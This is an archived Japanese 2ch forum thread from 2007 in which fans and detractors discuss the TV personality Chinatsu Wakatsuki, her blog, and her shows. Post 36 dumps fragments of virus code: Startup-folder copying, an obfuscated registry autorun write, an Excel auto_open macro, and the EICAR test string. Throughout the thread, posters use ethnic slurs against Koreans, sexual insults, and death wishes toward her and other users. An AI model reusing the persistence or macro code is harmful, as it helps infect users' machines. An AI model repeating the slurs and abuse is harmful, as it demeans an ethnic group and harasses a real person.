5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ブログの】若槻千夏・26【女王?】

1 :通行人さん@無名タレント:2007/02/13(火) 23:21:36 ID:zepamZXt0
バラエティー、映画とマルチに大活躍するチナッティーこと若槻千夏ちゃんの応援スレッド26シリーズ目でございます!!
これからも若槻千夏ちゃんのことについて、これまで以上に存分に語り合いましょう!

前スレ 【チナッティー】若槻千夏・25【ガンガレ】
http://tv9.2ch.net/test/read.cgi/geino/1164901794/

※若槻千夏ちゃん関連URL

・オフィシャル系

若槻千夏のブログ『マーボー豆腐は飲み物です』
http://ameblo.jp/wakatsuki/
若槻千夏ちゃん所属事務所「プラチナムプロダクション」HP
ttp://www.platinumpro.co.jp/
携帯用プラチナム公式サイト「ぴ写プラチナム」)
ttp://ptptpt.jp/

・若槻千夏ちゃんのスケジュールは↓のURLでチェックしましょう

TVstationタレントスケジュール
ttp://tvstation.jp/contents/tal/east-now.html
Yahoo!テレビ
ttp://tv.yahoo.co.jp/
若槻千夏ちゃんファンサイト(1つ目)
ttp://summer-kiss.hp.infoseek.co.jp/
若槻千夏ちゃんファンサイト(2つ目)
ttp://www.joy.hi-ho.ne.jp/taka-kun/china2.htm

・若槻千夏ちゃん専用アップローダー
ちぃろだ2号
ttp://bbs.avi.jp/bbs.php?kid=70865&cnt=no&br=pc&s=

2 :通行人さん@無名タレント:2007/02/13(火) 23:29:55 ID:eqcm1hPE0
2なら後で考える

3 :通行人さん@無名タレント:2007/02/13(火) 23:30:59 ID:/hKonE2n0
【ただいま】若槻千夏・25【静養中】
http://tv9.2ch.net/test/read.cgi/geino/1164911821/

4 :名無しさん@乳無しタレント:2007/02/14(水) 00:10:38 ID:LnVmDdWP0
ブログおもろす

5 :通行人さん@無名タレント:2007/02/14(水) 00:43:27 ID:vpYtaVrfO
ブログの女王に対抗してプログの女王を名乗るチナッティ

6 :通行人さん@無名タレント:2007/02/14(水) 01:46:44 ID:5DTqwrqy0
757 :通行人さん@無名タレント:2007/02/06(火) 15:52:02 ID:qL21mxXd0
アメーバブログに思わせぶりな事書いて
有料携帯サイトのリンク、そこ行くと
海外に行くから1週間更新できないってだけだって
なんだそりゃ

2007-02-06 11:00:09
2007/02/06テーマ:ブログ
おはようございます。

朝から少し悲しいお知らせがあります。

詳細はプラチナムプロダクションのケータイサイトのblogの方で確認下さい。ぜし。

http://ptptpt.jp/
有料携帯
有料携帯

若槻千夏アメーバブログ
http://ameblo.jp/wakatsuki/
http://ex17.2ch.net/test/read.cgi/news4vip/1170738253/

全て削除されてたが
なんだよあれ、世の中の汚さを勉強した、ありゃまずいだろw詐欺だろw

好感度上がりまくりだったのに
 終 了


7 :通行人さん@無名タレント:2007/02/14(水) 02:07:59 ID:dtkT27Wf0
http://talent.kutsulog.net/cat0100-1.php
ブッチギリの1位

8 :通行人さん@無名タレント:2007/02/14(水) 04:27:35 ID:xclfYGTlO
コメントなくせよ
あんな規制かかりまくりでマンセーしかないんだったらいらねぇよ

9 :通行人さん@無名タレント:2007/02/14(水) 07:13:22 ID:iuZbaNhm0
マンセーばっかで気持ち悪い。

10 :通行人さん@無名タレント:2007/02/14(水) 09:46:40 ID:yKmE850hO
>>8>>9どの芸能人のコメントもあんな感じだが。そんな俺は若槻ファン

11 :通行人さん@無名タレント:2007/02/14(水) 12:08:45 ID:E8wf/nkz0
チョンに負けたチョッパリwww

12 :通行人さん@無名タレント:2007/02/14(水) 16:04:46 ID:iuZbaNhm0
>>10
お前も気持ち悪い

13 :通行人さん@無名タレント:2007/02/14(水) 20:25:11 ID:UlMQgOv20
>>11
じゃあ本名で生きろよ糞チョソ

14 :通行人さん@無名タレント:2007/02/15(木) 07:17:06 ID:bgaFNmFAO
こないだの電子台でさんまがチナッティーにえらい厳しかった


15 :通行人さん@無名タレント:2007/02/15(木) 07:58:39 ID:7ET3yN4HP
>>14
kwsk!!!

16 :通行人さん@無名タレント:2007/02/15(木) 08:15:53 ID:bgaFNmFAO
無双興業はシン葉がなんであんなヤリマン&ヒールキャラにされてるか理解不能
ただ魏というだけでという感が
俺の中では三国プロレス一の美女ディーバ&悲劇のヒロインなんだが

17 :通行人さん@無名タレント:2007/02/15(木) 13:15:32 ID:bgaFNmFAO
>>16誤爆したスマン

18 :通行人さん@無名タレント:2007/02/15(木) 14:56:28 ID:UI0TNJAZ0
若槻の片思いの件でショックを受けてる奴って意外と少ないのか
俺はすげえショックだったが。

19 :通行人さん@無名タレント:2007/02/15(木) 15:14:45 ID:yHubiLPW0
俺もどえらいショックへこんだ

20 :通行人さん@無名タレント:2007/02/15(木) 15:25:18 ID:sOCTjlDh0
日本人なら許せるが相手が.........。

21 :通行人さん@無名タレント:2007/02/15(木) 15:53:48 ID:5OxpFQ7n0
本人も在日だからいいだろw


22 :通行人さん@無名タレント:2007/02/15(木) 16:31:25 ID:bK6pjnwx0
有料ブログの件をスルーし続け、朝鮮男に色目を使う若槻

23 :通行人さん@無名タレント:2007/02/15(木) 16:34:11 ID:sOCTjlDh0
正直しんどい

24 :通行人さん@無名タレント:2007/02/15(木) 16:41:09 ID:oAPMvsAa0
早く更新してほしいな

25 :通行人さん@無名タレント:2007/02/15(木) 16:53:37 ID:oC5qxUTh0
>>18-21
君たちの大好きな安倍首相も安倍首相の奥さんも韓国俳優好きだよ。

26 :通行人さん@無名タレント:2007/02/15(木) 17:52:03 ID:UI0TNJAZ0
>>25
奴らの趣味など知るか

若槻千夏だからショックを受けてんだよ馬鹿たれ

27 :通行人さん@無名タレント:2007/02/15(木) 18:21:26 ID:7znpx7Ms0
更新ないがブログもう秋田か?

28 :あやか:2007/02/15(木) 19:06:08 ID:dgQYVTsEO
ブログみたいメ

29 :通行人さん@無名タレント:2007/02/15(木) 20:19:19 ID:1zAz1sFs0
俺も若槻好きだけど、さすがにショックなんて受けないわ。
まだアイドルだと思ってる人って結構いたのか・・・。俺には芸人にしか見えない。

30 :通行人さん@無名タレント:2007/02/15(木) 20:20:58 ID:yHubiLPW0
>>25
無能が好き?氏ねや基地外在日

31 :通行人さん@無名タレント:2007/02/15(木) 21:25:35 ID:Uxrp8/2B0
若槻は好きだが事務所のスルーっぷりにはムカつくな。

32 :通行人さん@無名タレント:2007/02/15(木) 21:32:28 ID:0aAZgYmlO
>>14サンマは死ねよ

33 :通行人さん@無名タレント:2007/02/15(木) 22:31:04 ID:brn9tHH+0
>>31
上手くいってない空気がある。
ブログ始めたのも韓国男の話題の作り方もせっぱつまってる感じ。


34 :通行人さん@無名タレント:2007/02/15(木) 22:41:52 ID:SqrRrMld0
>>33
やっぱり、例の失恋した男の話題をそらすためなんかなあ。
あれほど力を入れてた「うまッチ」をドタキャンしたことといい、相手はフジのアナウンサーってのは当たってるのかな。

35 :通行人さん@無名タレント:2007/02/15(木) 23:19:48 ID:bEIh59D70
宮迫とのコントクイズみたいなので、チナッティー=アイドル、宮迫=追っかけのオタク
という図式で

宮迫のボケに対して冷たくあしらうような対応に怒って、いろいろ言ってたな。
(はっきりいってさんまの態度はアイドルやからさわぎの女どもに対するソレではなく、若手芸人とかに
対するダメ出しに近いモノがあった。)でもよく言えば、さんまのちなってぃーへの愛を
感じたな。他のアイドルだったらあんなおこりかたはしない。
それだけちなってぃーに期待してるんだなーと。

しかし韓国人LOVEを唱えといてちょん切るはないだろう(w


36 :通行人さん@無名タレント:2007/02/15(木) 23:44:32 ID:pNynxiyg0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


37 :通行人さん@無名タレント:2007/02/16(金) 00:23:06 ID:G5bINyB60
事務所は外資な気がする

あと好きな相手が自分の好きな芸能人とかなら別にかまわないが
相手が相手だけに、、、なんかがっかりだ

38 :通行人さん@無名タレント:2007/02/16(金) 00:40:12 ID:8FT/U+g7P
チョソ好きが「ちょん切りました」とか言ってるよwww

39 :通行人さん@無名タレント:2007/02/16(金) 01:24:01 ID:F9x/5JAK0
>>35
見てたけど、あれは若槻はダメだな。あれに関してはさんまの言い分が
正しい。でも即興でコントとか普通のアイドルでは無理だしよくやってる
よ。

40 :通行人さん@無名タレント:2007/02/16(金) 02:07:54 ID:9ph4Az400
さんまには裏でもかなりダメ出しされてるって前から言ってなかったっけ・・・。
かなりさんまに鍛えられてるな。

41 :通行人さん@無名タレント:2007/02/16(金) 04:22:16 ID:i7UR67Il0
明石家の若槻は全然やる気が無かった。
たぶんわざとやろ。さんまに対する抗議やろ。
けどさんまは番組内ではちゃんと仕事せえって感じなんやろな。

42 :通行人さん@無名タレント:2007/02/16(金) 04:36:45 ID:vgX422Vz0
若槻来週久々にヘキサゴン出るんだよな。大沢あかねみたいに久しぶりに出たのに
前が詰まって最後の解答出来ないとかならないと良いな。

43 :通行人さん@無名タレント:2007/02/16(金) 05:04:54 ID:KppKzGaZ0
また工作員がウィルスぶち込んでるねw

44 :通行人さん@無名タレント:2007/02/16(金) 05:38:42 ID:ruLFLQh60
>>41
もう完全に投げやりだったよね。

45 :通行人さん@無名タレント:2007/02/16(金) 09:09:27 ID:Rv39HD/yQ
若槻おわったな

46 :通行人さん@無名タレント:2007/02/16(金) 09:20:08 ID:JXuwC5IO0
さんま終わった過去の人

47 :通行人さん@無名タレント:2007/02/16(金) 10:33:40 ID:t3GZjx0r0
AVご出演マダァ?(・∀・ )っノシ凵⌒☆チンチン

48 :通行人さん@無名タレント:2007/02/16(金) 15:47:36 ID:5jsVxI1P0
若槻やる気ないんなら、明石家電視台、里田にゆずってやってくれ。

49 :通行人さん@無名タレント:2007/02/16(金) 16:19:58 ID:VqNWEKUc0
若槻は勉強しなかっただけ頭はいい
里田は真性バカ次元が違う

50 :通行人さん@無名タレント:2007/02/16(金) 17:07:05 ID:LSFjpPgI0
若槻やる気ないんなら、明石家電視台、浜田翔子にゆずってやってくれ。

51 :通行人さん@無名タレント:2007/02/16(金) 22:30:29 ID:ThQLzuJr0
若槻やる気ないんなら、熊田に・・・・。

52 :通行人さん@無名タレント:2007/02/16(金) 23:44:11 ID:WJbw0cpV0
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
■■■□■■■□□□□□■■■□□□■■■□■□■■■■■■□■■■■■
■□□□□□■□■■■□■■□■■□■■■■□■■■■■■■□■■■■■
■■■□■■■□■■■□■■■■■□■■□□□□□■■■■■□■■■■■
■□□□□□■□□□□□■■□□□□□■■■□■■■■■■■□■■■■■
■□■■■□■□■■■□■■□■□■□■■□□□■■■■■■□■■■■■
■□□□□□■□■■■□■■□□□□□■■■□■■■■■■■□■■■■■
■□■■■□■□□□□□■■□■□■□■□□□□□■■■■□■□■■■■
■□□□□□■□■■■□■■□□□□□■■■□■■■■■□■■■□■■■
■■■□■■■□■■■□■■■■■■■■■■□■■■■□■■■■■□■■
■□□□□□■□■■■□■□■□■□■□■■□■■■■□■■■■■□■■
■■■□■■□■■■□□■□■□■□■□■■□■■■□■■■■■■■□■
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■

53 :通行人さん@無名タレント:2007/02/17(土) 01:17:23 ID:nsOCt4q90
ファション性を出したり、女うけを狙ってるとこが痛い
朝コメント読んだりとか書いてあった
隠れて絶対にこのスレも覗いてるはずw

54 :通行人さん@無名タレント:2007/02/17(土) 02:43:34 ID:FEgeQq170
>>52を見てピクロスをやりたくなったw
削除されまくった批判コメントも読んで欲しいねぇ

55 :明石家よゐこ ◆c3SAmMA3sg :2007/02/17(土) 04:59:13 ID:b2rqxkuS0
最近ちなってぃの出演予定が公式にもまともに書いてないんだけど
めんどくさいな
前のバリバリバリュー見逃したよw

56 :通行人さん@無名タレント:2007/02/17(土) 05:18:30 ID:9gQGCai7O
チナッティのアメブロ読みやすくて面白い。
センスがいいな。

57 :通行人さん@無名タレント:2007/02/17(土) 12:32:17 ID:lDBcXoFR0
どう見ても、可愛くないがw

58 :通行人さん@無名タレント:2007/02/17(土) 14:40:18 ID:gWiF1jIZO
若槻って何で使われてるの?

59 :通行人さん@無名タレント:2007/02/17(土) 14:52:02 ID:G0svE1Lj0
可愛いくて、機転がきくから

60 :通行人さん@無名タレント:2007/02/17(土) 15:22:27 ID:2o1DOjIS0
最近初々しさがなく、ちょっときもち悪くなってきた。
でも、好きかなぁ。

61 :通行人さん@無名タレント:2007/02/17(土) 16:04:20 ID:sRrmDsK3O
若槻Tvでてくんな

62 :通行人さん@無名タレント:2007/02/17(土) 21:04:51 ID:p1dy1CPR0
本当に個人的な好みで言うと
最近のお化粧の系統がちょっち…

昔付き合ってた娘が、就職して半年ぐらいで
全然俺の好みじゃないトンガリ眉毛の化粧に
変わった時の悲しみを思い出すような出さないような


63 :通行人さん@無名タレント:2007/02/17(土) 21:42:11 ID:bU0q5Q6dO
テレビとかで たまに見ると なんで こんな娘、気になっちゃうんだろう…って思わせる唯一のタレント

悔しいけどグラビア見たりすると 可愛い♪って思っちゃう

安田美沙子ぐらいに無難に立ち回ってくれたら胸張って好きって言えるんだが…

64 :通行人さん@無名タレント:2007/02/17(土) 21:52:08 ID:p1dy1CPR0
今のチナッティは多分本人にもコントロールできてない
微妙なバランスっすね

滅茶苦茶ぽいけど、そこに本人の素の弱さとか限界が
垣間見えるところで可愛くおもっちゃう

世の中にはそれを全く分からせない
ある種完璧な職業アイドルもいるんだが
チナッティが好きな人は、そういう事は
あまり求めてないんじゃなかろうか

などとオモー

65 :通行人さん@無名タレント:2007/02/17(土) 22:27:46 ID:UjuTpQGF0
素材は良いんだよね
あのイカレタ事務所じゃ未来は暗い

66 :通行人さん@無名タレント:2007/02/18(日) 00:17:17 ID:4TvXhqhu0
素顔がわかる今のチナッティがいいけどなあ
事務所のことはよくわからんが、コリン星人の
チナッティはいやだな

胸の話ししかできないチナッティとかもやだし
つか、そんなん他にいるし、あまり興味ないし〜

みたいな

67 :通行人さん@無名タレント:2007/02/18(日) 03:05:37 ID:QpILx66J0
事務所がこいつを酷使している
こいつもそろそろ気付くべきだが、従順なサラリーマンと化している

68 :通行人さん@無名タレント:2007/02/18(日) 03:26:29 ID:1p2AIgFvO
事務所はバー893絡みらしいからな

69 :通行人さん@無名タレント:2007/02/18(日) 09:57:41 ID:Aq6mEWJ5O
63 64 本人っぽぃ

70 :通行人さん@無名タレント:2007/02/18(日) 11:56:35 ID:xlgcVDIV0
元ファンというべきか、ここにはアンチになりつつある!(^^)!

71 :通行人さん@無名タレント:2007/02/18(日) 13:39:56 ID:4TvXhqhu0
チナッティは朝まで飲んだんですかねw

72 :通行人さん@無名タレント:2007/02/18(日) 23:31:13 ID:JDszLXJ+O
>>69消えろやきめぇ。

73 :通行人さん@無名タレント:2007/02/18(日) 23:33:37 ID:JDszLXJ+O
若槻千夏批判してるヤツ本当に痛いし。きめぇよヒッキーどもが。

74 :通行人さん@無名タレント:2007/02/18(日) 23:58:41 ID:Wf1S0QrW0
テレビでぶー垂れる姿はわずらわしい。きめぇよバカ槻。

75 :通行人さん@無名タレント:2007/02/19(月) 01:53:04 ID:UHfMDpmK0
Wf1S0QrW0
頭異常に悪いな

76 :通行人さん@無名タレント:2007/02/19(月) 11:14:37 ID:4mO1TQdQ0
>>74
最低限のマナーってことだよな。

77 :通行人さん@無名タレント:2007/02/19(月) 18:00:47 ID:vjZaV5bnO
>>75頭悪かったら競馬の番組とか勤まらないだろ。彼女かなり努力したよ。

78 :通行人さん@無名タレント:2007/02/19(月) 18:57:12 ID:wNDoalVD0
>>77
74 :通行人さん@無名タレント:2007/02/18(日) 23:58:41 ID:Wf1S0QrW0
テレビでぶー垂れる姿はわずらわしい。きめぇよバカ槻。

ID:Wf1S0QrW0 ←頭異常に悪いな

若槻は勉強をしなかっただけ頭は良い



79 :通行人さん@無名タレント:2007/02/19(月) 19:31:00 ID:Bgd+gMPQO
いまはやってない競馬番組

80 :通行人さん@無名タレント:2007/02/19(月) 20:15:47 ID:FPZSXqSqO
この人見た目悪くて中身はイイヤツなんだって思わせるのに必死だね

81 :通行人さん@無名タレント:2007/02/19(月) 20:16:56 ID:FPZSXqSqO
若槻きえろ

82 :通行人さん@無名タレント:2007/02/19(月) 20:23:23 ID:Wklk0jwQ0
こいつが昔、10才サバ読んでるアイドルがいるって暴露したことがあるじゃん
結局だれのことだったの?

83 :通行人さん@無名タレント:2007/02/19(月) 20:38:37 ID:jouuRdyCO
若槻しね
テレビに映りたいだけの失礼な奴は死んだらいい

84 :通行人さん@無名タレント:2007/02/19(月) 21:00:08 ID:vjZaV5bnO
>>82お前アンチのとこにも書いてたよな。キモいからこっち来んなやカス。

85 :通行人さん@無名タレント:2007/02/19(月) 21:17:45 ID:VF4my+L90
>>82
井上和香?

86 :通行人さん@無名タレント:2007/02/19(月) 21:24:55 ID:L1u/R9N/0
若槻は2ちゃんねらーだったのか。
http://www.youtube.com/watch?v=znbEwVsiQCU

87 :通行人さん@無名タレント:2007/02/19(月) 21:25:01 ID:Wklk0jwQ0
>>85
ぐぐったら色んな説があるな
井○、川○、牛○・・・
放送当時は熊○じゃないか?とか色々と議論になってた

>>84
書いてねーよ

88 :通行人さん@無名タレント:2007/02/19(月) 21:28:32 ID:XLx8EylaO


バカだけど、顔はかわいいと思う。♀ですが。

89 :通行人さん@無名タレント:2007/02/19(月) 22:04:28 ID:vjZaV5bnO
>>82本当にスマンかったアンカーミス>>83お前相当暇人なんだな、死んだらいいのはお前だろ。

90 :通行人さん@無名タレント:2007/02/19(月) 22:46:23 ID:jouuRdyCO
>>89
暇だからって、何で死ななきゃならないんだよwww
この女は中島に失礼な事してんじゃん。
死ねは言いすぎたかもしれないけど、最近の若槻はちょっと見苦しいもんがある。
明らかに今日のヘイヘイヘイは、若槻が悪い。

91 :通行人さん@無名タレント:2007/02/19(月) 23:11:52 ID:atFuFck6O
>>87
熊田以外わかんねw

92 :通行人さん@無名タレント:2007/02/19(月) 23:21:08 ID:vjZaV5bnO
>>90死ねは言い過ぎたな。若槻ファンの俺からすりゃかなり腹立ったよ。

でも確かに中島には失礼だった。

93 :通行人さん@無名タレント:2007/02/19(月) 23:24:17 ID:2pCAJELo0
>>87
川村ひかる

94 :通行人さん@無名タレント:2007/02/19(月) 23:41:18 ID:Hn2Mdvs+O
若槻ファン(オタク)ってまだいるの?若槻もう終わったね。若槻出てるとウザイ!早く氏ね!

95 :通行人さん@無名タレント:2007/02/19(月) 23:43:06 ID:s4vYYDT4O
川村ひかるって48年生まれ34才
24っていってないよな?この間26ともなってたし27ともなってた

ギャラもめした社長の誕生日会なんてよく出るよなw

96 :通行人さん@無名タレント:2007/02/20(火) 00:01:24 ID:moY1AxdUO
アンチはアンチ板へ行こうね。ルールくらい守んないと、ヒッキーどもが!!

97 :通行人さん@無名タレント:2007/02/20(火) 01:35:17 ID:rB0YJQw80
うわあああっ!なんだよブログのアップ写真っ!

抱きしめてぇ!抱きしめてぇ!
抱きしめてぇ!抱きしめてぇぇっ!

98 :通行人さん@無名タレント:2007/02/20(火) 02:23:14 ID:xQSAPtUyO
若槻は日本の恥じ!TVに出るな!日本の女がみんな非常識なバカに間違えられたら若槻の責任!

99 :通行人さん@無名タレント:2007/02/20(火) 03:18:20 ID:xQSAPtUyO
日本から若槻を追い出す運動します。

100 :通行人さん@無名タレント:2007/02/20(火) 03:23:25 ID:AFW7HOCe0
>>95
川村ひかるの年齢はいっつも芸スポでもギャグになってるよ。本当か
どうかは知らないけど、そういう噂がむかしから有ったから若槻が
話したんだろ


101 :通行人さん@無名タレント:2007/02/20(火) 03:45:04 ID:RjufJbod0
二重になってる

102 :通行人さん@無名タレント:2007/02/20(火) 07:23:10 ID:KnLGND0hO
それ俺も思った
なんか不自然

103 :通行人さん@無名タレント:2007/02/20(火) 09:41:34 ID:K6Xbp/v/0
俺、首筋に激萌えしたぞ
顔うずめてチューしたい

104 :通行人さん@無名タレント:2007/02/20(火) 09:51:42 ID:HDzsjfqz0
前から一重ではなかっただろう。

105 :通行人さん@無名タレント:2007/02/20(火) 12:45:56 ID:pdCRh70G0
どのアンチも二言目には「整形」だもんな…
テレビ見んなよ

106 :通行人さん@無名タレント:2007/02/20(火) 12:57:25 ID:9nQzr4SuO
若槻好きだ!

107 :通行人さん@無名タレント:2007/02/20(火) 12:58:41 ID:nXbzXtSI0
若槻はいいやつ事務所は糞

108 :通行人さん@無名タレント:2007/02/20(火) 15:38:34 ID:U0RkMfPC0
東スポにグラビア・トーク・オーディションが終わって、メレンゲの気持ちが
松浦に変わるって出てたらしいな。本当かな。

109 :通行人さん@無名タレント:2007/02/20(火) 16:43:53 ID:moY1AxdUO
だからアンチはもう片方で騒いでろよ。こっち来んなムナクソわりぃ

110 :通行人さん@無名タレント:2007/02/20(火) 17:28:19 ID:EHXazmM90
たまたま3月までだったんだろ両方とも

111 :通行人さん@無名タレント:2007/02/20(火) 18:46:21 ID:iy3OFyTt0
グラビア・トークの場合は仕方ないね。番組内容的にも低調だしな。メレンゲも無理矢理
どかされた感があるな。本当に交替か東スポ情報だけじゃわからないけどね。

競馬の番組も終わったし、司会からまたバラエティータレントみたいななるのか。ロンハー
とか出たら一番良いんだろうけど、淳との関係も有って出れないな。

112 :通行人さん@無名タレント:2007/02/20(火) 21:37:26 ID:0dbf/E130
メレンゲ降板
ttp://tvmania.livedoor.biz/archives/50758408.html

113 :通行人さん@無名タレント:2007/02/21(水) 00:43:46 ID:AtYgGVDrO
若槻千夏「中3の1年間で30人〜40人に告白された」
http://ex21.2ch.net/test/read.cgi/morningcoffee/1171983890/

114 :通行人さん@無名タレント:2007/02/21(水) 04:20:07 ID:X8dtDimq0
狼では若槻の変わりに松浦が入ることに疑問の声があがってた。
相田翔子と二人がUFAのメンバーになるし。

115 :通行人さん@無名タレント:2007/02/21(水) 08:36:01 ID:Advj6SnuO
メレンゲ降板の件をコメントしたら消されたよ。

116 :通行人さん@無名タレント:2007/02/21(水) 19:02:38 ID:esWPnOLg0
若槻は地球から出て行けーーーーーー

117 :通行人さん@無名タレント:2007/02/21(水) 19:34:00 ID:3HAG47yY0
千夏はかわいいなぁ(*´д`*)

118 :通行人さん@無名タレント:2007/02/21(水) 19:42:59 ID:+kQbuwcz0
井上和香のブログには負けるな!

119 :通行人さん@無名タレント:2007/02/21(水) 20:17:40 ID:TBEpLzGjO
チナッティー可愛いすぎ!!好きだー。

120 :通行人さん@無名タレント:2007/02/21(水) 22:43:40 ID:zYwNnW4W0
「自己中」はさすがにうまい解答だったな

121 :通行人さん@無名タレント:2007/02/21(水) 23:01:33 ID:2cYvBwte0
千夏まりもっこりうp

122 :通行人さん@無名タレント:2007/02/22(木) 00:21:10 ID:jjdpGVHr0
http://talent.kutsulog.net/cat0100-1.php
http://talent.kutsulog.net/cat0100-2.php
桁違い
若槻ダントツ1位もはやブログの女王ですよ
井上あわれ

123 :通行人さん@無名タレント:2007/02/22(木) 00:30:08 ID:rFg4evlZ0



埼玉の肉便器だったサセ子・・・よって、あのレベルでも言い寄る男が多数いた。それだけの話。





124 :通行人さん@無名タレント:2007/02/22(木) 00:49:11 ID:zmRmqzUAO
ちなっちゃんよりおもしろいグラドルいない。つまんないやつばっか

125 :通行人さん@無名タレント:2007/02/22(木) 01:03:38 ID:nHn5cNUZO
>>123キモいからこっちくんな

126 :通行人さん@無名タレント:2007/02/22(木) 01:17:02 ID:E9bwLUrNO
ホリプロが向いてるな。

127 :通行人さん@無名タレント:2007/02/22(木) 02:27:42 ID:jwRLNZvq0
あびるがいるけど良いの?

128 :通行人さん@無名タレント:2007/02/22(木) 04:37:52 ID:zmRmqzUAO
格付け出てほしい〜。
若つき出たらもっとおもしろくなりそう。

129 :通行人さん@無名タレント:2007/02/22(木) 04:46:32 ID:jVcHacJT0
今日の石畳は素晴らしかったな、あそこでこけれるのには神がかったたものを感じたぞ

130 :通行人さん@無名タレント:2007/02/22(木) 07:51:49 ID:nHn5cNUZO
チナッティー可愛いよ♪へ(^o^ヘ)(ノ^o^)ノ♪

131 :通行人さん@無名タレント:2007/02/22(木) 08:16:29 ID:Fz01H37fO
若槻うるさいだけだしうざいよ!調子こいてるし早く消えろ!!!!!!!!!

132 :通行人さん@無名タレント:2007/02/22(木) 09:31:56 ID:H+WELPx60
なんか、若槻のブログに書き込みする時、
若槻が理解できる漢字しか使わないように
しない?

133 :通行人さん@無名タレント:2007/02/22(木) 16:30:29 ID:GSPlj5km0
>>128
藤崎奈々子かよ。面白いけど、グラビアアイドルとしては
完璧に終わるな。

134 :通行人さん@無名タレント:2007/02/22(木) 19:14:29 ID:f4dVpeQD0
グラビアアイドルとして終わった奴らが出てるんだろ
若槻もそろそろ該当しそう

135 :通行人さん@無名タレント:2007/02/22(木) 19:18:48 ID:KlcqwoOYO
昔出てたよ。

136 :通行人さん@無名タレント:2007/02/22(木) 19:50:02 ID:f4dVpeQD0
若槻。。。。
奴はどうなりたいんだ。。。。

137 :通行人さん@無名タレント:2007/02/22(木) 21:22:32 ID:RFzYXDWG0
蒼井そらのブログで若槻とハンサムの話題が出てた。
ハンサムはけっこういい客寄せになってんだな。

138 :通行人さん@無名タレント:2007/02/22(木) 23:21:52 ID:rFg4evlZ0
一年間の流れ
テレ朝ドラマ「レガッタ」の低視聴率&打ち切り

タレント価値低下&ギャラ低下

ギャラトラブル&仮病休暇

活動再開&アメブロ開始

有料ブログ勧誘騒動

国際恋愛カミングアウト

139 :通行人さん@無名タレント:2007/02/22(木) 23:27:59 ID:wQb7HQMz0
昨日ヘキサゴンで陣内が元カノに一言話してる時に
意味なく映されてたけど意味あるの?

140 :通行人さん@無名タレント:2007/02/22(木) 23:32:05 ID:nHn5cNUZO
>>138死ね

141 :通行人さん@無名タレント:2007/02/23(金) 00:30:10 ID:AYs80F7J0
>>134
そういう意味じゃなくて、普通は元カレの番組で共演しないだろ。もし、何にも
関係なかったら別に出て良いよ。安めぐみも熊田もグラビアアイドルとしてみんな
頑張ってるし。でも若槻が出た場合は前に藤崎奈々子が格付け出た時みたいに、
どこどこに行ったとかどんなプレゼントを貰ったみたいな話を共演しながら言う
事になるだろ。そこまでやったらダメだろ。他の番組に全く出れなくなったなら
仕方ないけどまだ他の番組でも需要全然有るわけだしな。

142 :通行人さん@無名タレント:2007/02/23(金) 02:14:52 ID:U5P316u70
>>137
事務所の人?
ハンサムで盛り上げようとしても無理だから

143 :通行人さん@無名タレント:2007/02/23(金) 02:54:13 ID:LzrejAw00
十分盛り上がってンジャン。おまえが毛嫌いしてるだけ。

144 :通行人さん@無名タレント:2007/02/23(金) 03:30:39 ID:U5P316u70
そんなに盛り上がってることにしたいのね

145 :通行人さん@無名タレント:2007/02/23(金) 08:53:40 ID:Fo5IRNar0
めちゃ盛り上がってるじゃん

146 :通行人さん@無名タレント:2007/02/23(金) 13:37:11 ID:3HGkhXRJO
若槻は、ブログのコメントみて嬉しいのかな?
クスっとなるようなシュールさを狙ってるのに、あのコメントじゃ丸潰れ。
若槻、恥ずかしいだろな。

147 :通行人さん@無名タレント:2007/02/23(金) 17:02:49 ID:7Wz+gau70
http://talent.kutsulog.net/cat0100-1.php
週間も月間も若槻がダントツ1位

28 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)